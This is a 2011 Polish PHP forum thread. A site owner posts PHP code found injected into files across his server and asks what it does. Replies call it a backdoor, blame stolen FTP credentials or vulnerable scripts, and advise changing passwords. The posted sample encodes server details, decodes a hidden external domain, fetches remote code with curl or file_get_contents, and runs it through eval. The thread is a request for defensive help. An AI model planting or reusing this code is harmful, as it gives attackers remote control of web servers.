Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Włam na serwer?, Proszę o sprawdzenie kodu
deha21
post
Post #1





Grupa: Zarejestrowani
Postów: 544
Pomógł: 5
Dołączył: 18.08.2009

Ostrzeżenie: (0%)
-----


Dziś na FTPie zobaczyłem dziwne pliku typu 14234.php w każdym z podkatalogów. A nich był taki kod:
  1. $a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
  2. $b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
  3. $c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
  4. $d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
  5. $e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
  6. $f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
  7. $g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
  8. $h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
  9. $i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
  10. $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
  11. $z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwZmVlZC5ydQ==");
  12.  
  13. if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="efc1c2e5b4abb3c0af1b6ff7a20906a7") $f=$_REQUEST["id"];
  14. if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);
  15. else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
  16. else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
  17. curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
  18. $o=curl_exec($cu);
  19. curl_close($cu);
  20. eval($o);};
  21. die();

Ktoś może mi powiedzieć co to jest? Ktoś chciał się włamać na serwer?
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi (1 - 6)
Fifi209
post
Post #2





Grupa: Zarejestrowani
Postów: 4 655
Pomógł: 556
Dołączył: 17.03.2009
Skąd: Katowice

Ostrzeżenie: (0%)
-----


Zgadnę, że łączysz się przez total commandera, filezillę czy coś w ten deseń - oczywiście hasła zapamiętane. ;]
Wirus odczytuje hasła z ftp i loginy i robi co chce - np. dodaje kod złośliwy.
Go to the top of the page
+Quote Post
deha21
post
Post #3





Grupa: Zarejestrowani
Postów: 544
Pomógł: 5
Dołączył: 18.08.2009

Ostrzeżenie: (0%)
-----


Cytat(fifi209 @ 4.03.2011, 19:53:54 ) *
Zgadnę, że łączysz się przez total commandera, filezillę czy coś w ten deseń - oczywiście hasła zapamiętane. ;]

Błąd (IMG:style_emoticons/default/wink.gif) Używam Maca, korzystam z CyberDuck (darmowy, ściągnięty z oficjalnej strony)
Go to the top of the page
+Quote Post
Fifi209
post
Post #4





Grupa: Zarejestrowani
Postów: 4 655
Pomógł: 556
Dołączył: 17.03.2009
Skąd: Katowice

Ostrzeżenie: (0%)
-----


Zacznij od zmiany hasła, potem od usuwania kodu.

btw na macu to wirusów nie ma? jakaś nowość.

Ten post edytował fifi209 4.03.2011, 20:01:08
Go to the top of the page
+Quote Post
deha21
post
Post #5





Grupa: Zarejestrowani
Postów: 544
Pomógł: 5
Dołączył: 18.08.2009

Ostrzeżenie: (0%)
-----


Ok zmienione, tak na wszelki wypadek. Co to kod miał za zadanie zrobić?
Cytat(fifi209 @ 4.03.2011, 20:00:50 ) *
btw na macu to wirusów nie ma? jakaś nowość.

Są ale jest ich na pewno mniej i są rzadziej spotykane. Poza tym chyba ciężko dorzucić wirusa do programu który jest oryginalny i od ponad roku nie sprawiał problemów?
Go to the top of the page
+Quote Post
erix
post
Post #6





Grupa: Moderatorzy
Postów: 15 467
Pomógł: 1451
Dołączył: 25.04.2005
Skąd: Szczebrzeszyn/Rzeszów




~fifi209, to że ktoś z TC korzysta, to nie znaczy, że hasła muszą pochodzić z tego miejsca. Można korzystać z globalnego klucza albo SFTP/SCP (tak, da się (IMG:style_emoticons/default/tongue.gif) ).

Cytat
Ktoś może mi powiedzieć co to jest? Ktoś chciał się włamać na serwer?

Sprawdź swoje skrypty. Są dziurawe. Albo któraś z bibliotek, z których korzystają.

To zwykły backdoor, który pozwala na dołączenie Twojego serwera jako farmy zombie.
Go to the top of the page
+Quote Post
kiler129
post
Post #7





Grupa: Zarejestrowani
Postów: 566
Pomógł: 35
Dołączył: 21.06.2006

Ostrzeżenie: (0%)
-----


Cytat(erix @ 4.03.2011, 20:56:24 ) *
~fifi209, to że ktoś z TC korzysta, to nie znaczy, że hasła muszą pochodzić z tego miejsca. Można korzystać z globalnego klucza albo SFTP/SCP (tak, da się (IMG:style_emoticons/default/tongue.gif) ).


Większość serwerów nie pozwala na SFTP (bo to w końcu SSH, do tego wolne bo nie projektowano go do transferu plików). Dodajmy że OSX to nie windows - pyta cię zawsze o dostęp do keyringa oraz jeśli to nieznana apka to dodatkowo o twoje hasło.
Z doświadczenia powiem, że nie ma za bardzo sposobu aby z keyringa hasła wyciągać - szybciej tutaj jest błąd w samej webaplikacji - zanalizuj logi lub je pokaż tu.
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 25.08.2025 - 05:40